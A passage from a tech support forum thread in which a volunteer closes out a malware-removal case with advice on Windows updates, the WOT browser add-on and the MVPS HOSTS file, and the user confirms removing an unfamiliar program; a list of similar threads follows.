https://www.bleepingcomputer.com/anno...dom-of-speech/

------------------------------------------------------

MICROSOFT UPDATES
It is very important that you get all of the critical updates for your Operating System and Internet Explorer. Keeping your OS and browser up to date will help make you less susceptible to attacks by Trojans and viruses. Please go to Microsoft and download all the critical updates to help prevent possible re-infection.

------------------------------------------------------

SPYWARE PREVENTION
In light of your recent problem, I'm sure you'd like to avoid any future infections. Please read this well written article: To help protect your computer in the future I recommend that you get the following free programs if you do not already have them:
  • WOT, Web of Trust, warns you about risky websites that try to scam visitors, deliver malware, or send spam. Protect your computer against online threats by using WOT as your front-line layer of protection when browsing or searching in unfamiliar territory. WOT's color-coded icons show you ratings for 21 million websites, helping you avoid the dangerous sites:
    • Green to go
    • Yellow for caution
    • Red to stop
    WOT has an add-on available for IE, Firefox, and Chrome.
  • MVPS HOSTS FILE replaces your current HOSTS file with one that will restrict known ad sites from serving you unsolicited advertisements. It basically prevents your computer from connecting to those sites by redirecting them to 127.0.0.1, which is the IP of your local computer. See guide here and for Windows Vista here
Keep your antivirus program and antispyware programs updated and scan with them on a regular basis.

Please respond to this thread one more time so we can mark this thread as resolved.
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-26-2016, 08:14 PM   #20
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



I did as suggested. I also looked at the programs and found something called Speccy installed April 18 which I have deleted. I have no recollection of it and do not need it.

Thank You
win98forever is offline  
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Similar Threads
Thread Thread Starter Forum Replies Last Post
0.0.0.0.1 Default page!
My chrome has this as default page the IP 0.0.0.0.1 and it keeps changing to random things! Also I had some chinese softwares installed on my PC out of nowhere thirdly there is this Russian site which became the default homepage prior to all that, in essence my pc has something wrong with it. >.< ...
Psychosis Virus/Trojan/Spyware Help 16 10-28-2016 12:52 AM
Possible Virus?....
Hello, I originally went to download a program called iExplorer (load music to Iphone without ITunes) and afterwards whenever I opened Firefox, the screen that I attached appears (and not my home page). I hope that you're able to help me fix this :smile: Below is the DDS.txt file...and...
hbkvcu Resolved HJT Threads 20 09-26-2016 10:41 AM
redirect virus
I'm having a problem where I randomly get redirected to this adobe spam site, as soon as a website redirects it automatically downloads something to my computer. I used to be able to cancel the download but now the files always save too fast for me to cancel. I also can't seem to get onto sites...
shelf12 Virus/Trojan/Spyware Help 34 03-26-2014 05:07 AM
CPU at 100% most of the time.
Hi guys, Lately I have been having a problem with my PC. On several occasions my PC has slowed right down and virtually ground to a halt. When I've checked it with Task Manager, it shows that the processor is running at 100%, and that there are over 40 processes running at once. This can happen...
Hairymartin1966 Resolved HJT Threads 35 08-09-2013 11:33 AM
Security center problem
I am using Windows 7 64-bit and Opera browser which does not seem affected, however Chrome browser constantly redirects to ads after first item. have not tested IE or Firefox windows security center keeps turning off, will not turn on from Action Center in services.msc Security Center says...
daveh41 Resolved HJT Threads 17 09-22-2012 11:47 PM

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
[IMG] code is on
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Post a Question


» Site Navigation
 > FAQ
  > 10.0.0.2
Powered by vBadvanced CMPS v3.2.3


All times are GMT -7. The time now is 07:51 PM.


Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2020, vBulletin Solutions, Inc.
vBulletin Security provided by vBSecurity v2.2.2 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
User Alert System provided by Advanced User Tagging v3.1.0 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
Copyright 2001 - 2018, Tech Support Forum

Windows 10 - Windows 7 - Windows XP - Windows Vista - Trojan Removal - Spyware Removal - Virus Removal - Networking - Security - Top Web Hosts